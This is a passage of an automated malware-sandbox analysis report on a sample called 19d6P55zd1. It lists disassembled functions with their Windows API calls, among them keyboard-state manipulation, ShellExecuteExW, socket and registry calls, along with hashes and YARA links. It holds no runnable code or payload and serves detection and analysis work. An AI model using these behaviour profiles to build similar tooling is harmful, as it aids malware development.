                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 256516436-0
                                                                                                                    • Opcode ID: 0c3d7e4167985af59c413a63a45b6dae623d2003996a7d5f86ceb20e6c26c6e0
                                                                                                                    • Instruction ID: 3ed7f8b3fce1c255cbf7e7d4e0923fca43ae0650e2753f8b732e1aec56ac9f87
                                                                                                                    • Opcode Fuzzy Hash: 0c3d7e4167985af59c413a63a45b6dae623d2003996a7d5f86ceb20e6c26c6e0
                                                                                                                    • Instruction Fuzzy Hash: 59317035A00205EFCB12EFA5DC85AAEB7B9EF45710F1441B5E904AF256DB30EE54CB60
                                                                                                                    Function 003A61D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 003A61EB
                                                                                                                    • GetDC.USER32(00000000), ref: 003A61F3
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003A61FE
                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 003A620A
                                                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 003A6246
                                                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 003A6257
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,003A902A,?,?,000000FF,00000000,?,000000FF,?), ref: 003A6291
                                                                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 003A62B1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3864802216-0
                                                                                                                    • Opcode ID: 95b2a93d225c34948361fd3064e381b332ed9a1613195f62e738b55ee3fa3274
                                                                                                                    • Instruction ID: 93d6da799e0bacc50a7107e07a44e6f11df088d47fc381c1c8cca08ec61f17d5
                                                                                                                    • Opcode Fuzzy Hash: 95b2a93d225c34948361fd3064e381b332ed9a1613195f62e738b55ee3fa3274
                                                                                                                    • Instruction Fuzzy Hash: 79314F72101214BFEB128F50CC8AFEB3BADEF4A765F094065FE089A1A2C6759C41CB64
                                                                                                                    Function 0037BBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memcmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2931989736-0
                                                                                                                    • Opcode ID: 5f49d5d331370da01abfe4c50c6424257a8e18fb1c1522eff3a87d4eb95a67b4
                                                                                                                    • Instruction ID: 9413ff529a1a36b0b28eb9d975980be66287bb1f36c74beae79d9e5cc6aa8baf
                                                                                                                    • Opcode Fuzzy Hash: 5f49d5d331370da01abfe4c50c6424257a8e18fb1c1522eff3a87d4eb95a67b4
                                                                                                                    • Instruction Fuzzy Hash: 1421AA616016067BE6276611DD42FFBF77D9E1038CF05C114FE085EA47EB58EE1581A1
                                                                                                                    Function 0038EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00329837: __itow.LIBCMT ref: 00329862
                                                                                                                      • Part of subcall function 00329837: __swprintf.LIBCMT ref: 003298AC
                                                                                                                      • Part of subcall function 0033FC86: _wcscpy.LIBCMT ref: 0033FCA9
                                                                                                                    • _wcstok.LIBCMT ref: 0038EC94
                                                                                                                    • _wcscpy.LIBCMT ref: 0038ED23
                                                                                                                    • _memset.LIBCMT ref: 0038ED56
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                    • String ID: X
                                                                                                                    • API String ID: 774024439-3081909835
                                                                                                                    • Opcode ID: ab0449e1b09e4dc09ac40bc1aa3335bbbd06da0489db5a6f83099a2581a9459d
                                                                                                                    • Instruction ID: 53a56af3920c48c8e01dc1ae64f7d91a13c2c031af42ee3fe15a6303d78ff2ab
                                                                                                                    • Opcode Fuzzy Hash: ab0449e1b09e4dc09ac40bc1aa3335bbbd06da0489db5a6f83099a2581a9459d
                                                                                                                    • Instruction Fuzzy Hash: 32C19D356087109FC726EF24D881A6AB7E4FF85310F01496DF8999B2A2DB70ED45CB82
                                                                                                                    Function 00396B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00396C00
                                                                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00396C21
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00396C34
                                                                                                                    • htons.WSOCK32(?,?,?,00000000,?), ref: 00396CEA
                                                                                                                    • inet_ntoa.WSOCK32(?), ref: 00396CA7
                                                                                                                      • Part of subcall function 0037A7E9: _strlen.LIBCMT ref: 0037A7F3
                                                                                                                      • Part of subcall function 0037A7E9: _memmove.LIBCMT ref: 0037A815
                                                                                                                    • _strlen.LIBCMT ref: 00396D44
                                                                                                                    • _memmove.LIBCMT ref: 00396DAD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3619996494-0
                                                                                                                    • Opcode ID: aad7131a4baa2823526763b4cf53126132df4e268156e693ca9f2a5766593c58
                                                                                                                    • Instruction ID: 160366e41ef16afa6c5735e6b319778652fee57b8cb67de0cc1c8e779772248e
                                                                                                                    • Opcode Fuzzy Hash: aad7131a4baa2823526763b4cf53126132df4e268156e693ca9f2a5766593c58
                                                                                                                    • Instruction Fuzzy Hash: AC81CD72204310AFDB12EF24DC82F6AB7A8AF85714F50491DF9569F292DB70ED44CB92
                                                                                                                    Function 00321424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: edd360c8f4d14e1702bab510cda9e6d37bb3e64ff045138b7cd3db7a934d61b6
                                                                                                                    • Instruction ID: 11c7399bfd0e06973f07822b4e7a0354346104b508e39d3825b33fb5cff52645
                                                                                                                    • Opcode Fuzzy Hash: edd360c8f4d14e1702bab510cda9e6d37bb3e64ff045138b7cd3db7a934d61b6
                                                                                                                    • Instruction Fuzzy Hash: 6E719B30900119EFCB06DF99DD49EBFBB79FF8A310F218159F915AA251C734AA11CBA0
                                                                                                                    Function 003AB351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • IsWindow.USER32(011B58C8), ref: 003AB3EB
                                                                                                                    • IsWindowEnabled.USER32(011B58C8), ref: 003AB3F7
                                                                                                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 003AB4DB
                                                                                                                    • SendMessageW.USER32(011B58C8,000000B0,?,?), ref: 003AB512
                                                                                                                    • IsDlgButtonChecked.USER32(?,?), ref: 003AB54F
                                                                                                                    • GetWindowLongW.USER32(011B58C8,000000EC), ref: 003AB571
                                                                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 003AB589
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4072528602-0
                                                                                                                    • Opcode ID: cb11adfeb683e3a6626300fea934c5cd165ad9f0caa45cc7ea5e8acfae51753e
                                                                                                                    • Instruction ID: 8bccf64f274eabf4c9284e97b5c9a8696adf1c7a42b2ad03682c8380463a86f0
                                                                                                                    • Opcode Fuzzy Hash: cb11adfeb683e3a6626300fea934c5cd165ad9f0caa45cc7ea5e8acfae51753e
                                                                                                                    • Instruction Fuzzy Hash: 20718C38604204EFEF269F66C894FBABBB9EF0B300F154159E945972A3C732A950DB50
                                                                                                                    Function 0039F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 0039F448
                                                                                                                    • _memset.LIBCMT ref: 0039F511
                                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 0039F556
                                                                                                                      • Part of subcall function 00329837: __itow.LIBCMT ref: 00329862
                                                                                                                      • Part of subcall function 00329837: __swprintf.LIBCMT ref: 003298AC
                                                                                                                      • Part of subcall function 0033FC86: _wcscpy.LIBCMT ref: 0033FCA9
                                                                                                                    • GetProcessId.KERNEL32(00000000), ref: 0039F5CD
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0039F5FC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 3522835683-2766056989
                                                                                                                    • Opcode ID: dbb66761a0e016014cc743180f67d9f7281254cab05d0dd3731175eeb3cae404
                                                                                                                    • Instruction ID: 709bb0f99e5c88b553e91bdd8d83c3046da9a5d546bb9927310df42c46ba7471
                                                                                                                    • Opcode Fuzzy Hash: dbb66761a0e016014cc743180f67d9f7281254cab05d0dd3731175eeb3cae404
                                                                                                                    • Instruction Fuzzy Hash: 4061BE75A006299FCF16DFA4C481AAEBBF4FF49310F15806AE819AB351CB30AD41CB80
                                                                                                                    Function 00380F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetParent.USER32(?), ref: 00380F8C
                                                                                                                    • GetKeyboardState.USER32(?), ref: 00380FA1
                                                                                                                    • SetKeyboardState.USER32(?), ref: 00381002
                                                                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00381030
                                                                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 0038104F
                                                                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00381095
                                                                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 003810B8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 87235514-0
                                                                                                                    • Opcode ID: 638727265d4c7600b78f27661c8c97bf2132cc988801e31dfbffa6e12abed50d
                                                                                                                    • Instruction ID: fa9e050576de5ddcb458c6ad900b000e66d48e09dd790c6e4c672028b73edc28
                                                                                                                    • Opcode Fuzzy Hash: 638727265d4c7600b78f27661c8c97bf2132cc988801e31dfbffa6e12abed50d
                                                                                                                    • Instruction Fuzzy Hash: 2B51D3A05047D53DFB3762348C05BB6BFAD5B06304F0989C9E2D8898D3C299DCCAD751
                                                                                                                    Function 00380D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetParent.USER32(00000000), ref: 00380DA5
                                                                                                                    • GetKeyboardState.USER32(?), ref: 00380DBA
                                                                                                                    • SetKeyboardState.USER32(?), ref: 00380E1B
                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00380E47
                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00380E64
                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00380EA8
                                                                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00380EC9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 87235514-0
                                                                                                                    • Opcode ID: 9223202703bc8045a34bec50dfec8955bf153dc60242d0b7600e5e4bd5dad9a7
                                                                                                                    • Instruction ID: 478ea129b3c8d214ab95b198076ee104eacab8c546f10f91384f0f00925fed1d
                                                                                                                    • Opcode Fuzzy Hash: 9223202703bc8045a34bec50dfec8955bf153dc60242d0b7600e5e4bd5dad9a7
                                                                                                                    • Instruction Fuzzy Hash: E751F4A0504BD53EFB7BA7748C45B7BBEA96B06300F0988C9E1D49A8C2C395BC9DD750
                                                                                                                    Function 003855FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsncpy$LocalTime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2945705084-0
                                                                                                                    • Opcode ID: e819cb570162d4afa7e803b989f270cd5583e41f1b77b3a36d65cccd1ab1327f
                                                                                                                    • Instruction ID: 339a5c81671494e67e2d4c70785ddcd9a33cafa8c3bea7395fde87a25b6e80c8
                                                                                                                    • Opcode Fuzzy Hash: e819cb570162d4afa7e803b989f270cd5583e41f1b77b3a36d65cccd1ab1327f
                                                                                                                    • Instruction Fuzzy Hash: 7E417165C1061876CB13EBF48846ACFB3F8DF05310F5189A6F518EB221FA34A755C7A6
                                                                                                                    Function 0037D56C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0037D5D4
                                                                                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0037D60A
                                                                                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0037D61B
                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0037D69D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                    • String ID: ,,;$DllGetClassObject
                                                                                                                    • API String ID: 753597075-1747262133
                                                                                                                    • Opcode ID: 64bf9c2207aea4280125c9f6ea79b46be30d047602a585339971e93e93bb97a8
                                                                                                                    • Instruction ID: 468f8eb69190b804dcceaff4ab20f29ee5fe6a83ad97424d08a8c44cfdf771fe
                                                                                                                    • Opcode Fuzzy Hash: 64bf9c2207aea4280125c9f6ea79b46be30d047602a585339971e93e93bb97a8
                                                                                                                    • Instruction Fuzzy Hash: D8417EB1600204EFDB26DF64C884A9ABBB9EF44314F55C1ADED0D9F205D7B9D944CBA0
                                                                                                                    Function 00383671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0038466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00383697,?), ref: 0038468B
                                                                                                                      • Part of subcall function 0038466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00383697,?), ref: 003846A4
                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 003836B7
                                                                                                                    • _wcscmp.LIBCMT ref: 003836D3
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 003836EB
                                                                                                                    • _wcscat.LIBCMT ref: 00383733
                                                                                                                    • SHFileOperationW.SHELL32(?), ref: 0038379F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                                                    • String ID: \*.*
                                                                                                                    • API String ID: 1377345388-1173974218
                                                                                                                    • Opcode ID: d76fdb4df304f9b972db13b14f3364857fd0242e514693a9dc53ff63b59b4a29
                                                                                                                    • Instruction ID: aeb13f1775ae2cc5220781c7f8a4a394b10f7c21369987418016a54db915f260
                                                                                                                    • Opcode Fuzzy Hash: d76fdb4df304f9b972db13b14f3364857fd0242e514693a9dc53ff63b59b4a29
                                                                                                                    • Instruction Fuzzy Hash: 6141AE71508344AEC757EF64C481ADFB7ECAF89780F0008AEF49ACB251EA34D689C752
                                                                                                                    Function 003A7291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 003A72AA
                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003A7351
                                                                                                                    • IsMenu.USER32(?), ref: 003A7369
                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003A73B1
                                                                                                                    • DrawMenuBar.USER32 ref: 003A73C4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 3866635326-4108050209
                                                                                                                    • Opcode ID: cfc31bbe12093e87bf27c548a1e11a33a962f879cef4ebbbf38f340a763cf1f1
                                                                                                                    • Instruction ID: 92a2928bac229527c62d2ddf514476804e95e893a19a2373cbf88e57f3d8dec9
                                                                                                                    • Opcode Fuzzy Hash: cfc31bbe12093e87bf27c548a1e11a33a962f879cef4ebbbf38f340a763cf1f1
                                                                                                                    • Instruction Fuzzy Hash: 75412779A04208EFDF21DF50D884A9ABBF8FF06314F168529FD15AB290D730AD54DB90
                                                                                                                    Function 003A0FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 003A0FD4
                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003A0FFE
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 003A10B5
                                                                                                                      • Part of subcall function 003A0FA5: RegCloseKey.ADVAPI32(?), ref: 003A101B
                                                                                                                      • Part of subcall function 003A0FA5: FreeLibrary.KERNEL32(?), ref: 003A106D
